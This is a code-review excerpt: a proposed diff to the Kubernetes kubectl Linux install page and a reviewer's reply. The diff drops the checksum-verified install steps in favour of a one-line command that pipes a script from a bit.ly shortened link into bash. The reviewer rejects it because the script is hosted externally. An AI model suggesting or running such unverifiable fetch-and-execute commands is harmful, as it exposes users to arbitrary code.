content/en/docs/tasks/tools/install-kubectl-linux.md

```diff
@@ -24,68 +24,20 @@ The following methods exist for installing kubectl on Linux:
 - [Install using other package management](#install-using-other-package-management)
 
 ### Install kubectl binary with curl on Linux
-
-1. Download the latest release with the command:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
-   ```
-
-   {{< note >}}
-To download a specific version, replace the `$(curl -L -s https://dl.k8s.io/release/stable.txt)` portion of the command with the specific version.
-
-For example, to download version {{< param "fullversion" >}} on Linux, type:
-
-   ```bash
-   curl -LO https://dl.k8s.io/release/{{< param "fullversion" >}}/bin/linux/amd64/kubectl
-   ```
-   {{< /note >}}
-
-1. Validate the binary (optional)
-
-   Download the kubectl checksum file:
-
-   ```bash
-   curl -LO "https://dl.k8s.io/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl.sha256"
-   ```
-
-   Validate the kubectl binary against the checksum file:
-
-   ```bash
-   echo "$(<kubectl.sha256)  kubectl" | sha256sum --check
-   ```
-
-   If valid, the output is:
-
-   ```console
-   kubectl: OK
-   ```
-
-   If the check fails, `sha256` exits with nonzero status and prints output similar to:
-
-   ```bash
-   kubectl: FAILED
-   sha256sum: WARNING: 1 computed checksum did NOT match
-   ```
-
-   {{< note >}}
-   Download the same version of the binary and checksum.
-   {{< /note >}}
-
-1. Install kubectl
-
-   ```bash
-   sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
-   ```
+Install `kubectl` on Linux by one command:
+```bash
+/bin/bash -c "$(curl -fsSL https://bit.ly/3gWAFoJ)"
```

Comment:
@wxw-matt we couldn't accept a link to an externally-hosted script

What you can do instead is put that script in the [static content directory](https://github.com/kubernetes/website/tree/main/static) for this repository.

I would be tempted to provide two options using [tabs](https://kubernetes.io/docs/contribute/style/hugo-shortcodes/#tabs). The first tab could use a script to make things easier, and the second tab could document the manual steps for people who are wary of running arbitrary scripts they find on websites.

If you could use POSIX shell, rather than `bash`, then the approach you're suggesting would be even more portable.